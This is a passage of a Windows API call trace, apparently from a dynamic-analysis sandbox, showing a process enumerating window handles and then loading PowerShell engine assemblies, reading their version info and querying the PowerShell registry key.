	[0447.152] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xfa8
	[0447.153] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xfbc
	[0447.153] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xfb8
	[0447.153] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xfb4
	[0447.153] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xfb0
	[0447.153] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xfac
	[0447.153] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xfc0
	[0447.153] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xfd0
	[0447.153] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xf88
	[0447.153] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xf84
	[0447.153] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xf80
	[0447.154] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xde0
	[0447.154] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xddc
	[0447.154] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xdd8
	[0447.154] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xd34
	[0447.154] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xd10
	[0447.154] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xd0c
	[0447.154] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xc9c
	[0447.154] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xc74
	[0447.154] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xc1c
	[0447.154] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xc08
	[0447.154] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xabc
	[0447.155] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x24c
	[0447.155] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xbb0
	[0447.155] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xbfc
	[0447.155] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xb10
	[0447.155] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x374
	[0447.155] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x368
	[0447.155] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xb28
	[0447.155] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xae8
	[0447.155] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xb14
	[0447.155] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x95c
	[0447.155] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xa8c
	[0447.156] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x46c
	[0447.156] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xb3c
	[0447.156] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xa90
	[0447.156] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xad0
	[0447.156] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xa9c
	[0447.156] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xaa0
	[0447.156] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xb1c
	[0447.156] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x7e0
	[0447.156] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xa74
	[0447.156] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x694
	[0447.157] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xa28
	[0447.157] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x9b0
	[0447.157] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x8d8
	[0447.157] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x940
	[0447.157] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x93c
	[0447.157] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4ec
	[0447.157] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x150
	[0447.157] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x720
	[0447.460] WerSetFlags () returned 0x0
	[0447.466] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0447.466] CoTaskMemFree (pv=0x0) 
	[0447.467] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1eddc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1eddc0 | out: pulNumLanguages=0x1eddc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1eddc0) returned 1
	[0447.467] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1eddc8, pwszLanguagesBuffer=0x2db5318, pcchLanguagesBuffer=0x1eddc0 | out: pulNumLanguages=0x1eddc8, pwszLanguagesBuffer=0x2db5318, pcchLanguagesBuffer=0x1eddc0) returned 1
	[0447.471] CoTaskMemAlloc (cb=0x24) returned 0x48fda0
	[0447.471] GetUserDefaultLocaleName (in: lpLocaleName=0x48fda0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0447.472] CoTaskMemFree (pv=0x48fda0) 
	[0447.492] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0447.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.492] CoTaskMemFree (pv=0x484300) 
	[0447.496] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0447.496] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.497] CoTaskMemFree (pv=0x484300) 
	[0447.499] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0447.499] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.499] CoTaskMemFree (pv=0x484300) 
	[0448.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0448.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0448.427] SetErrorMode (uMode=0x1) returned 0x1
	[0448.427] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1eda40 | out: lpFileInformation=0x1eda40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0448.427] SetErrorMode (uMode=0x1) returned 0x1
	[0448.427] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1edcb0 | out: lpdwHandle=0x1edcb0) returned 0x94c
	[0448.428] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2db8ba8 | out: lpData=0x2db8ba8) returned 1
	[0448.429] VerQueryValueW (in: pBlock=0x2db8ba8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1edc28, puLen=0x1edc20 | out: lplpBuffer=0x1edc28*=0x2db8c44, puLen=0x1edc20) returned 1
	[0448.429] VerQueryValueW (in: pBlock=0x2db8ba8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1edb98, puLen=0x1edb90 | out: lplpBuffer=0x1edb98*=0x2db8d20, puLen=0x1edb90) returned 1
	[0448.429] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0448.429] CoTaskMemAlloc (cb=0x2e) returned 0x4921f0
	[0448.429] lstrcpyW (in: lpString1=0x4921f0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0448.429] CoTaskMemFree (pv=0x4921f0) 
	[0448.429] VerQueryValueW (in: pBlock=0x2db8ba8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1edb98, puLen=0x1edb90 | out: lplpBuffer=0x1edb98*=0x2db8d74, puLen=0x1edb90) returned 1
	[0448.429] lstrlenW (lpString="System.Management.Automation") returned 28
	[0448.429] CoTaskMemAlloc (cb=0x3c) returned 0x49a160
	[0448.429] lstrcpyW (in: lpString1=0x49a160, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0448.429] CoTaskMemFree (pv=0x49a160) 
	[0448.429] VerQueryValueW (in: pBlock=0x2db8ba8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1edb98, puLen=0x1edb90 | out: lplpBuffer=0x1edb98*=0x2db8dd0, puLen=0x1edb90) returned 1
	[0448.429] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0448.430] CoTaskMemAlloc (cb=0x20) returned 0x496ec0
	[0448.430] lstrcpyW (in: lpString1=0x496ec0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0448.430] CoTaskMemFree (pv=0x496ec0) 
	[0448.430] VerQueryValueW (in: pBlock=0x2db8ba8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1edb98, puLen=0x1edb90 | out: lplpBuffer=0x1edb98*=0x2db8e10, puLen=0x1edb90) returned 1
	[0448.430] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0448.430] CoTaskMemAlloc (cb=0x44) returned 0x49a160
	[0448.430] lstrcpyW (in: lpString1=0x49a160, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0448.430] CoTaskMemFree (pv=0x49a160) 
	[0448.430] VerQueryValueW (in: pBlock=0x2db8ba8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1edb98, puLen=0x1edb90 | out: lplpBuffer=0x1edb98*=0x2db8e78, puLen=0x1edb90) returned 1
	[0448.430] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0448.430] CoTaskMemAlloc (cb=0x76) returned 0x446ff0
	[0448.430] lstrcpyW (in: lpString1=0x446ff0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0448.430] CoTaskMemFree (pv=0x446ff0) 
	[0448.430] VerQueryValueW (in: pBlock=0x2db8ba8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1edb98, puLen=0x1edb90 | out: lplpBuffer=0x1edb98*=0x2db8f14, puLen=0x1edb90) returned 1
	[0448.430] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0448.430] CoTaskMemAlloc (cb=0x44) returned 0x49a160
	[0448.430] lstrcpyW (in: lpString1=0x49a160, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0448.430] CoTaskMemFree (pv=0x49a160) 
	[0448.430] VerQueryValueW (in: pBlock=0x2db8ba8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1edb98, puLen=0x1edb90 | out: lplpBuffer=0x1edb98*=0x2db8f78, puLen=0x1edb90) returned 1
	[0448.430] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0448.430] CoTaskMemAlloc (cb=0x58) returned 0x465f90
	[0448.430] lstrcpyW (in: lpString1=0x465f90, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0448.430] CoTaskMemFree (pv=0x465f90) 
	[0448.430] VerQueryValueW (in: pBlock=0x2db8ba8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1edb98, puLen=0x1edb90 | out: lplpBuffer=0x1edb98*=0x2db8ff4, puLen=0x1edb90) returned 1
	[0448.430] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0448.430] CoTaskMemAlloc (cb=0x20) returned 0x496ec0
	[0448.430] lstrcpyW (in: lpString1=0x496ec0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0448.430] CoTaskMemFree (pv=0x496ec0) 
	[0448.431] VerQueryValueW (in: pBlock=0x2db8ba8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1edb98, puLen=0x1edb90 | out: lplpBuffer=0x1edb98*=0x2db8c9c, puLen=0x1edb90) returned 1
	[0448.431] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0448.431] CoTaskMemAlloc (cb=0x66) returned 0x4960f0
	[0448.431] lstrcpyW (in: lpString1=0x4960f0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0448.431] CoTaskMemFree (pv=0x4960f0) 
	[0448.431] VerQueryValueW (in: pBlock=0x2db8ba8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1edb98, puLen=0x1edb90 | out: lplpBuffer=0x1edb98*=0x0, puLen=0x1edb90) returned 0
	[0448.431] VerQueryValueW (in: pBlock=0x2db8ba8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1edb98, puLen=0x1edb90 | out: lplpBuffer=0x1edb98*=0x0, puLen=0x1edb90) returned 0
	[0448.431] VerQueryValueW (in: pBlock=0x2db8ba8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1edb98, puLen=0x1edb90 | out: lplpBuffer=0x1edb98*=0x0, puLen=0x1edb90) returned 0
	[0448.431] VerQueryValueW (in: pBlock=0x2db8ba8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1edb68, puLen=0x1edb60 | out: lplpBuffer=0x1edb68*=0x2db8c44, puLen=0x1edb60) returned 1
	[0448.431] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0448.431] VerLanguageNameW (in: wLang=0x0, szLang=0x43c750, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0448.431] CoTaskMemFree (pv=0x43c750) 
	[0448.431] VerQueryValueW (in: pBlock=0x2db8ba8, lpSubBlock="\\", lplpBuffer=0x1edbb8, puLen=0x1edbb0 | out: lplpBuffer=0x1edbb8*=0x2db8bd0, puLen=0x1edbb0) returned 1
	[0448.438] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0448.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0448.438] CoTaskMemFree (pv=0x484300) 
	[0448.440] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0448.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0448.440] CoTaskMemFree (pv=0x484300) 
	[0448.444] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1eda88 | out: phkResult=0x1eda88*=0x2f8) returned 0x0
	[0448.445] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1eda78 | out: phkResult=0x1eda78*=0x2fc) returned 0x0
	[0448.445] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1edb08 | out: phkResult=0x1edb08*=0x300) returned 0x0
	[0448.447] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1eda4c, lpData=0x0, lpcbData=0x1eda48*=0x0 | out: lpType=0x1eda4c*=0x1, lpData=0x0, lpcbData=0x1eda48*=0x56) returned 0x0
	[0448.448] CoTaskMemAlloc (cb=0x5a) returned 0x496080
	[0448.448] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1eda1c, lpData=0x496080, lpcbData=0x1eda18*=0x56 | out: lpType=0x1eda1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1eda18*=0x56) returned 0x0
	[0448.448] CoTaskMemFree (pv=0x496080) 
	[0448.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0448.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0448.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0448.804] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0448.804] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0448.804] CoTaskMemFree (pv=0x484300) 
	[0449.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ed640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0449.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ed640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0450.295] CoTaskMemAlloc (cb=0x104) returned 0x484410
	[0450.295] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.295] CoTaskMemFree (pv=0x484410) 
	[0450.297] CoTaskMemAlloc (cb=0x104) returned 0x484410
	[0450.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.297] CoTaskMemFree (pv=0x484410) 
	[0450.610] CoTaskMemAlloc (cb=0x104) returned 0x484410
	[0450.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.610] CoTaskMemFree (pv=0x484410) 
	[0450.610] CoTaskMemAlloc (cb=0x104) returned 0x484410
	[0450.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.611] CoTaskMemFree (pv=0x484410) 
	[0450.611] CoTaskMemAlloc (cb=0x104) returned 0x484410
	[0450.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.611] CoTaskMemFree (pv=0x484410) 
	[0451.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0451.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0451.198] CoTaskMemAlloc (cb=0x104) returned 0x484410
	[0451.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0451.198] CoTaskMemFree (pv=0x484410) 
	[0451.200] CoTaskMemAlloc (cb=0x104) returned 0x484410
	[0451.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0451.200] CoTaskMemFree (pv=0x484410) 
	[0453.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0453.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0456.181] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0456.182] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0456.182] CoTaskMemFree (pv=0x484630) 
	[0456.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0456.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
